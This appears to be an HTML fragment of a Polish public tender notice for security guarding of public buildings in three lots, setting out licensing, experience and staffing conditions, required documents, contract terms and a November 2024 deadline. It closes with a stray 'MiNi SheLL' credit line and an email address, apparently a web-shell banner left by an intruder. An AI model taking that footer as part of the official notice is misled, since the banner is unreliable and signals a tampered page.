class="mb-0">Art. 109 ust. 1 pkt 3</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na podstawie przesłanek określonych w niniejszym rozdziale.<br/>2.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają następujące warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>dot. część 1-3:<br/>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca posiada ważną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób <br/>i mienia (bezpośrednia ochrona fizyczna) wydaną na podstawie ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t. j. Dz. U. z 2021 r. poz. 1995); <br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia Wykonawcy złożonego wg wzoru stanowiącego załącznik nr 4 do SWZ oraz koncesji.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek będzie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w tym zakresie;<br/>4)	zdolności technicznej lub zawodowej:<br/>dot. części 1 <br/>a) Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie), wykonał lub wykonuje należycie 2 usługi odpowiadające rodzajem usłudze stanowiącej przedmiot zamówienia tzn. polegające na świadczeniu usług stałej ochrony fizycznej osób i mienia obiektów użyteczności publicznej, świadczone nieprzerwanie przez okres co najmniej 12 miesięcy każda, o wartości świadczonych usług min. 200 000,00 zł brutto każda (słownie: dwieście tysięcy złotych).<br/>Za wykonanie powyższych usług należy rozumieć usługi wykonane (wykonywane) na podstawie 2 odrębnych umów.<br/>Przez obiekt: budynek użyteczności publicznej należy rozumieć: budynek<br/>przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny.<br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia w oparciu o oświadczenie Wykonawcy złożone wg wzoru stanowiącego załącznik nr 4 do SWZ oraz wykazu usług złożonego wg wzoru stanowiącego załącznik nr 5 do SWZ wraz z dowodami, określającymi czy te usługi zostały wykonane lub są wykonywane należycie.<br/><br/>b) Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w realizacji zamówienia, tj.:<br/>1. Zamawiający wymaga, aby Wykonawca przy realizacji zamówienia<br/>dysponował osobami wpisanymi na listę pracowników kwalifikowanych,<br/>zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie osób i mienia <br/>(t.j Dz. U. z 2021 r. poz. 1995) (z wyłączeniem osoby obsługującej<br/>szatnię) i legitymującymi się, co najmniej 2-letnim doświadczeniem w<br/>pracy w charakterze pracownika ochrony fizycznej w obiektach<br/>użyteczności publicznej, oraz posiadającymi doświadczenie związane z<br/>obsługą systemu sygnalizacji pożarowej, oddymiania, włamania i napadu,<br/>telewizji przemysłowej (z wyłączeniem osoby obsługującej szatnię) –<br/>zgodnie z wymaganiami określonymi w szczegółowym opisie przedmiotu<br/>zamówienia, stanowiącym załącznik nr 2 (część 1 ) do SWZ.<br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie<br/>spełnia na podstawie oświadczenia Wykonawcy złożonego wg wzoru<br/>stanowiącego załącznik nr 4 do SWZ.<br/><br/>2. Zamawiający wymaga, aby Wykonawca dysponował, co najmniej jedną<br/>grupą interwencyjną, której czas dojazdu do obiektów Zamawiającego od<br/>momentu zgłoszenia nie przekroczy 15 minut.<br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie<br/>spełnia na podstawie oświadczenia Wykonawcy złożonego wg wzoru<br/>stanowiącego załącznik nr 4 do SWZ.<br/><br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/>lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, <br/>do realizacji których te zdolności są wymagane.<br/><br/>dot. części 2:<br/>c) Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże,<br/>że w okresie ostatnich trzech lat przed upływem terminu składania ofert<br/>(a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał lub wykonuje należycie 2 usługi odpowiadające rodzajem usłudze stanowiącej przedmiot zamówienia tzn. polegające na świadczeniu usług stałej ochrony fizycznej osób <br/>i mienia obiektów użyteczności publicznej, świadczone nieprzerwanie przez okres <br/>co najmniej 12 miesięcy każda, o wartości świadczonych usług min. 100 000,00 zł brutto każda (słownie: sto tysięcy złotych).<br/>Za wykonanie powyższych usług należy rozumieć usługi wykonane<br/>(wykonywane) na podstawie 2 odrębnych umów.<br/><br/>Przez obiekt: budynek użyteczności publicznej należy rozumieć: budynek<br/>przeznaczony na potrzeby administracji publicznej, wymiaru<br/>sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego,<br/>nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi<br/>bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub<br/>telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie<br/>kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz<br/>inny obiekt przeznaczony do wykonywania podobnych funkcji; za obiekt<br/>użyteczności publicznej uznaje się także budynek biurowy lub socjalny.<br/><br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie<br/>spełnia w oparciu o oświadczenie Wykonawcy złożone wg wzoru stanowiącego załącznik nr 4 do SWZ.<br/><br/>d) Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże,<br/>że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w<br/>realizacji zamówienia.<br/>1.Zamawiający wymaga, aby Wykonawca przy realizacji zamówienia dysponował osobami wpisanymi na listę pracowników kwalifikowanych, zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie osób i mienia (t.j. Dz. U. z 2021 poz. 1995) legitymującymi się, co najmniej 2-letnim doświadczeniem w pracy w charakterze pracownika ochrony fizycznej w obiektach użyteczności publicznej, oraz posiadającymi doświadczenie związane z obsługą systemu przeciwpożarowego , systemu oddymiania, systemu sygnalizacji włamania i napadu, systemu kontroli dostępu, systemu domofonowego, systemu telewizji przemysłowej– zgodnie ze szczegółowym opisem przedmiotu zamówienia stanowiącym załącznik nr 2 (część 2) do SWZ.<br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie<br/>spełnia w oparciu o oświadczenie Wykonawcy złożone wg wzoru<br/>stanowiącego załącznik nr 4 do SWZ.<br/><br/>2. Zamawiający wymaga, aby Wykonawca dysponował, co najmniej jedną<br/>grupą interwencyjną, której czas dojazdu do obiektów Zamawiającego <br/>od momentu zgłoszenia nie przekroczy 15 minut. <br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie<br/>spełnia w oparciu o oświadczenie Wykonawcy złożone wg wzoru stanowiącego załącznik nr 4 do SWZ.<br/><br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/>lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, <br/>do realizacji których te zdolności są wymagane.<br/><br/>dot. części 3:<br/>e) Zamawiający nie określa warunku w tym zakresie (pkt 4 powyżej- zdolność techniczna lub zawodowa). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1.1.	w celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu:<br/>1.1.1	dot. części nr 1-3 - aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia udzieloną przez Ministra Spraw Wewnętrznych i Administracji wraz ze wszystkimi decyzjami zmieniającymi koncesję wydanymi do pierwotnego dokumentu. <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek będzie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>1.1.2	dot. części nr 1- wykaz usług (wg wzoru stanowiącego załącznik 5 do SWZ) wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, określających czy te usługi zostały wykonane lub są wykonywane należycie w celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu. <br/>Dowodami potwierdzającymi czy usługi zostały wykonane należycie są: <br/>-referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane. <br/>W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać dokumentów, o których mowa powyżej. Jeśli Wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4.	Oferta winna zawierać wszystkie dokumenty wymienione w SWZ w następującym układzie:<br/>1)	wypełniony i podpisany przez osobę uprawnioną „Formularz oferty” – wg Załącznika nr 1 do SWZ;<br/>2)	oświadczenia i dokumenty, o których mowa w Rozdziale 7 ust. 2 i 3 SWZ:<br/>1.	oświadczenie, wg wzoru stanowiącego załącznik nr 4 do SWZ, o niepodleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu w<br/>zakresie wskazanym w rozdziale 6 SWZ.<br/>Oświadczenie składają odrębnie:<br/>a)	Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>b)	Podmiot trzeci, na którego potencjał powołuje się Wykonawca;<br/>2.	Dokumenty rejestrowe / pełnomocnictwo w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania; <br/>3.	Zobowiązanie podmiotu udostępniającego zasoby (jeśli dotyczy);<br/>4.	Zastrzeżenie tajemnicy przedsiębiorstwa, o którym mowa w rozdz. 11 ust. 8 (jeżeli dotyczy);<br/>1)	informacje o których mowa w Rozdziale 13 ust. 11 SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty i powinno<br/>ono zawierać w szczególności wskazanie postępowania udzielenie zamówienia publicznego, którego dotyczy, wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Szczegóły w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do umowy w sprawie zamówienia publicznego – wzór umowy zawarty jest w załączniku nr 3 do SWZ -odpowiednio do danej części.<br/>2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w przypadkach opisanych w projektowanych postanowieniach umowy (załącznik nr 3 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Drogą elektroniczną za pośrednictwem: https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-29 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Kryterium oceny ofert: Dotyczy części 1-3 <br/>Każda w/w osoba będzie zatrudniona u Wykonawcy przez cały okres trwania umowy na podstawie stosunku pracy zgodnie z art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy. <br/>2. Usługa będzie świadczona:<br/>- od dnia podpisania umowy, jednak nie wcześniej niż od dnia 1 lutego 2025r. przez okres 24 miesięcy (dot. część 1, 2).<br/>Usługa będzie świadczona:<br/>- od dnia podpisania umowy, jednak nie wcześniej niż dnia od 1 lutego 2025r. przez okres 24 miesięcy lub do wyczerpania kwoty, w zależności od tego, które zdarzenie nastąpi jako pierwsze. (dot. część 3).<br/>3. Wybrany w drodze niniejszego postępowania Wykonawca winien przed podpisaniem umowy złożyć Zamawiającemu: <br/>1)	informacje niezbędne do wypełnienia treści umowy na wezwanie Zamawiającego;<br/>2)	opłaconą i aktualną polisę OC wraz z dowodem zapłacenia wymaganej składki, bądź raty składki ubezpieczeniowej, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z Przedmiotem zamówienia na cały okres realizacji zamówienia- zgodnie ze wzorem umowy - PPU (część 1, część 2, cześć 3);<br/>3)	aktualny wykaz osób skierowanych do realizacji zamówienia wg. wzoru stanowiącego załącznik nr 6 do SWZ wraz z zaświadczeniami o wpisie na listę kwalifikowanych pracowników ochrony (jeśli dotyczy);<br/>4)	ewentualny wykaz podwykonawców.<br/>a)	Wykonawca może powierzyć wykonanie części zamówienia Podwykonawcy,<br/>b)	Z uwagi na fakt iż usługi, będące przedmiotem zamówienia mają być wykonane w miejscu podlegającym bezpośredniemu nadzorowi Zamawiającego, Zamawiający żąda, aby przed przystąpieniem do wykonania zamówienia Wykonawca, o ile są już znane, podał nazwy albo imiona i nazwiska oraz dane kontaktowe Podwykonawców i osób do kontaktu z nimi, zaangażowanych w takie usługi. Wykonawca zawiadamia Zamawiającego o wszelkich zmianach danych, o których mowa w zdaniu pierwszym, w trakcie realizacji zamówienia, a także przekazuje wymagane informacje na temat nowych Podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację usług. <br/>c)	Podwykonawca powinien posiadać stosowne uprawnienia do prowadzenia określonej działalności gospodarczej, jeżeli są wymagane przepisami prawa. <br/>d)	Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. Przepis art. 122 ustawy stosuje się odpowiednio.<br/>e) Powierzenie wykonania części zamówienia Podwykonawcom nie zwalnia<br/>Wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia.<br/>4. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przedstawić Zamawiającemu kopię umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5. Zamawiający wykluczy z postępowania Wykonawcę wobec którego zachodzą przesłanki określone w art. 7 ust. 1 pkt 1-3 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego . Wykluczenie Wykonawcy następuje na okres trwania okoliczności określonych w art. 7 ust. 1 pkt 1-3 ustawy sankcyjnej.<br/>6. Szczegóły w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com